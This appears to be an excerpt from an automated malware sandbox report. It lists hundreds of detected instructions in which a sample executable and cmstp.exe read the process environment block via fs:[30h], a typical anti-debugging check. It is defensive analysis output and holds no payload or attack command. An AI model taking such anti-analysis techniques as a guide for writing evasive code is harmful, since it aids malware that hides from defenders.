          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]1_2_00A9C577
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]1_2_00A9C577
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB3D43 mov eax, dword ptr fs:[00000030h]1_2_00AB3D43
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF3540 mov eax, dword ptr fs:[00000030h]1_2_00AF3540
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B23D40 mov eax, dword ptr fs:[00000030h]1_2_00B23D40
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A97D50 mov eax, dword ptr fs:[00000030h]1_2_00A97D50
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF46A7 mov eax, dword ptr fs:[00000030h]1_2_00AF46A7
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]1_2_00B40EA5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]1_2_00B40EA5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]1_2_00B40EA5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0FE87 mov eax, dword ptr fs:[00000030h]1_2_00B0FE87
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA16E0 mov ecx, dword ptr fs:[00000030h]1_2_00AA16E0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A876E2 mov eax, dword ptr fs:[00000030h]1_2_00A876E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48ED6 mov eax, dword ptr fs:[00000030h]1_2_00B48ED6
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA36CC mov eax, dword ptr fs:[00000030h]1_2_00AA36CC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB8EC7 mov eax, dword ptr fs:[00000030h]1_2_00AB8EC7
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2FEC0 mov eax, dword ptr fs:[00000030h]1_2_00B2FEC0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7E620 mov eax, dword ptr fs:[00000030h]1_2_00A7E620
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2FE3F mov eax, dword ptr fs:[00000030h]1_2_00B2FE3F
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]1_2_00A7C600
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]1_2_00A7C600
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]1_2_00A7C600
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA8E00 mov eax, dword ptr fs:[00000030h]1_2_00AA8E00
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]1_2_00AAA61C
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]1_2_00AAA61C
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31608 mov eax, dword ptr fs:[00000030h]1_2_00B31608
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8766D mov eax, dword ptr fs:[00000030h]1_2_00A8766D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]1_2_00A9AE73
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]1_2_00A9AE73
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]1_2_00A9AE73
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]1_2_00A9AE73
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]1_2_00A9AE73
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]1_2_00A87E41
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]1_2_00A87E41
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]1_2_00A87E41
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]1_2_00A87E41
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]1_2_00A87E41
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]1_2_00A87E41
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]1_2_00B3AE44
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]1_2_00B3AE44
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]1_2_00AF7794
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]1_2_00AF7794
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]1_2_00AF7794
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A88794 mov eax, dword ptr fs:[00000030h]1_2_00A88794
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB37F5 mov eax, dword ptr fs:[00000030h]1_2_00AB37F5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]1_2_00A74F2E
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]1_2_00A74F2E
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAE730 mov eax, dword ptr fs:[00000030h]1_2_00AAE730
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]1_2_00B0FF10
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]1_2_00B0FF10
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]1_2_00AAA70E
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]1_2_00AAA70E
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]1_2_00B4070D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]1_2_00B4070D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9F716 mov eax, dword ptr fs:[00000030h]1_2_00A9F716
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8FF60 mov eax, dword ptr fs:[00000030h]1_2_00A8FF60
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48F6A mov eax, dword ptr fs:[00000030h]1_2_00B48F6A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8EF40 mov eax, dword ptr fs:[00000030h]1_2_00A8EF40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460746D mov eax, dword ptr fs:[00000030h]4_2_0460746D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A44B mov eax, dword ptr fs:[00000030h]4_2_0461A44B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467C450 mov eax, dword ptr fs:[00000030h]4_2_0467C450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467C450 mov eax, dword ptr fs:[00000030h]4_2_0467C450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461BC2C mov eax, dword ptr fs:[00000030h]4_2_0461BC2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B740D mov eax, dword ptr fs:[00000030h]4_2_046B740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B740D mov eax, dword ptr fs:[00000030h]4_2_046B740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B740D mov eax, dword ptr fs:[00000030h]4_2_046B740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]4_2_046A1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]4_2_04666C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]4_2_04666C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]4_2_04666C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]4_2_04666C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A14FB mov eax, dword ptr fs:[00000030h]4_2_046A14FB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666CF0 mov eax, dword ptr fs:[00000030h]4_2_04666CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666CF0 mov eax, dword ptr fs:[00000030h]4_2_04666CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666CF0 mov eax, dword ptr fs:[00000030h]4_2_04666CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8CD6 mov eax, dword ptr fs:[00000030h]4_2_046B8CD6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F849B mov eax, dword ptr fs:[00000030h]4_2_045F849B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460C577 mov eax, dword ptr fs:[00000030h]4_2_0460C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460C577 mov eax, dword ptr fs:[00000030h]4_2_0460C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04623D43 mov eax, dword ptr fs:[00000030h]4_2_04623D43
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04663540 mov eax, dword ptr fs:[00000030h]4_2_04663540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04693D40 mov eax, dword ptr fs:[00000030h]4_2_04693D40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04607D50 mov eax, dword ptr fs:[00000030h]4_2_04607D50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0466A537 mov eax, dword ptr fs:[00000030h]4_2_0466A537
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AE539 mov eax, dword ptr fs:[00000030h]4_2_046AE539
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04614D3B mov eax, dword ptr fs:[00000030h]4_2_04614D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04614D3B mov eax, dword ptr fs:[00000030h]4_2_04614D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04614D3B mov eax, dword ptr fs:[00000030h]4_2_04614D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8D34 mov eax, dword ptr fs:[00000030h]4_2_046B8D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]4_2_045F3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EAD30 mov eax, dword ptr fs:[00000030h]4_2_045EAD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]4_2_046AFDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]4_2_046AFDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]4_2_046AFDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]4_2_046AFDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04698DF1 mov eax, dword ptr fs:[00000030h]4_2_04698DF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]4_2_04666DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]4_2_04666DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]4_2_04666DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov ecx, dword ptr fs:[00000030h]4_2_04666DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]4_2_04666DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]4_2_04666DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FD5E0 mov eax, dword ptr fs:[00000030h]4_2_045FD5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FD5E0 mov eax, dword ptr fs:[00000030h]4_2_045FD5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046135A1 mov eax, dword ptr fs:[00000030h]4_2_046135A1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B05AC mov eax, dword ptr fs:[00000030h]4_2_046B05AC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B05AC mov eax, dword ptr fs:[00000030h]4_2_046B05AC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]4_2_045E2D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]4_2_045E2D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]4_2_045E2D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]4_2_045E2D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]4_2_045E2D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04611DB5 mov eax, dword ptr fs:[00000030h]4_2_04611DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04611DB5 mov eax, dword ptr fs:[00000030h]4_2_04611DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04611DB5 mov eax, dword ptr fs:[00000030h]4_2_04611DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]4_2_04612581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]4_2_04612581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]4_2_04612581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]4_2_04612581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461FD9B mov eax, dword ptr fs:[00000030h]4_2_0461FD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461FD9B mov eax, dword ptr fs:[00000030h]4_2_0461FD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]4_2_0460AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]4_2_0460AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]4_2_0460AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]4_2_0460AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]4_2_0460AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]4_2_045F7E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]4_2_045F7E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]4_2_045F7E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]4_2_045F7E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]4_2_045F7E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]4_2_045F7E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AAE44 mov eax, dword ptr fs:[00000030h]4_2_046AAE44
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AAE44 mov eax, dword ptr fs:[00000030h]4_2_046AAE44
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F766D mov eax, dword ptr fs:[00000030h]4_2_045F766D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0469FE3F mov eax, dword ptr fs:[00000030h]4_2_0469FE3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EC600 mov eax, dword ptr fs:[00000030h]4_2_045EC600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EC600 mov eax, dword ptr fs:[00000030h]4_2_045EC600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EC600 mov eax, dword ptr fs:[00000030h]4_2_045EC600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04618E00 mov eax, dword ptr fs:[00000030h]4_2_04618E00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1608 mov eax, dword ptr fs:[00000030h]4_2_046A1608
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A61C mov eax, dword ptr fs:[00000030h]4_2_0461A61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A61C mov eax, dword ptr fs:[00000030h]4_2_0461A61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EE620 mov eax, dword ptr fs:[00000030h]4_2_045EE620
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046116E0 mov ecx, dword ptr fs:[00000030h]4_2_046116E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04628EC7 mov eax, dword ptr fs:[00000030h]4_2_04628EC7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0469FEC0 mov eax, dword ptr fs:[00000030h]4_2_0469FEC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046136CC mov eax, dword ptr fs:[00000030h]4_2_046136CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F76E2 mov eax, dword ptr fs:[00000030h]4_2_045F76E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8ED6 mov eax, dword ptr fs:[00000030h]4_2_046B8ED6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046646A7 mov eax, dword ptr fs:[00000030h]4_2_046646A7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B0EA5 mov eax, dword ptr fs:[00000030h]4_2_046B0EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B0EA5 mov eax, dword ptr fs:[00000030h]4_2_046B0EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B0EA5 mov eax, dword ptr fs:[00000030h]4_2_046B0EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467FE87 mov eax, dword ptr fs:[00000030h]4_2_0467FE87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8F6A mov eax, dword ptr fs:[00000030h]4_2_046B8F6A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FEF40 mov eax, dword ptr fs:[00000030h]4_2_045FEF40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FFF60 mov eax, dword ptr fs:[00000030h]4_2_045FFF60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461E730 mov eax, dword ptr fs:[00000030h]4_2_0461E730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B070D mov eax, dword ptr fs:[00000030h]4_2_046B070D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B070D mov eax, dword ptr fs:[00000030h]4_2_046B070D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A70E mov eax, dword ptr fs:[00000030h]4_2_0461A70E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A70E mov eax, dword ptr fs:[00000030h]4_2_0461A70E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E4F2E mov eax, dword ptr fs:[00000030h]4_2_045E4F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E4F2E mov eax, dword ptr fs:[00000030h]4_2_045E4F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460F716 mov eax, dword ptr fs:[00000030h]4_2_0460F716
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467FF10 mov eax, dword ptr fs:[00000030h]4_2_0467FF10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467FF10 mov eax, dword ptr fs:[00000030h]4_2_0467FF10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046237F5 mov eax, dword ptr fs:[00000030h]4_2_046237F5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F8794 mov eax, dword ptr fs:[00000030h]4_2_045F8794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04667794 mov eax, dword ptr fs:[00000030h]4_2_04667794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04667794 mov eax, dword ptr fs:[00000030h]4_2_04667794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04667794 mov eax, dword ptr fs:[00000030h]4_2_04667794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A2073 mov eax, dword ptr fs:[00000030h]4_2_046A2073
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B1074 mov eax, dword ptr fs:[00000030h]4_2_046B1074
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04600050 mov eax, dword ptr fs:[00000030h]4_2_04600050
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04600050 mov eax, dword ptr fs:[00000030h]4_2_04600050
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]4_2_0461002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]4_2_0461002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]4_2_0461002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]4_2_0461002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]4_2_0461002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04667016 mov eax, dword ptr fs:[00000030h]4_2_04667016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04667016 mov eax, dword ptr fs:[00000030h]4_2_04667016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04667016 mov eax, dword ptr fs:[00000030h]4_2_04667016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]4_2_045FB02A
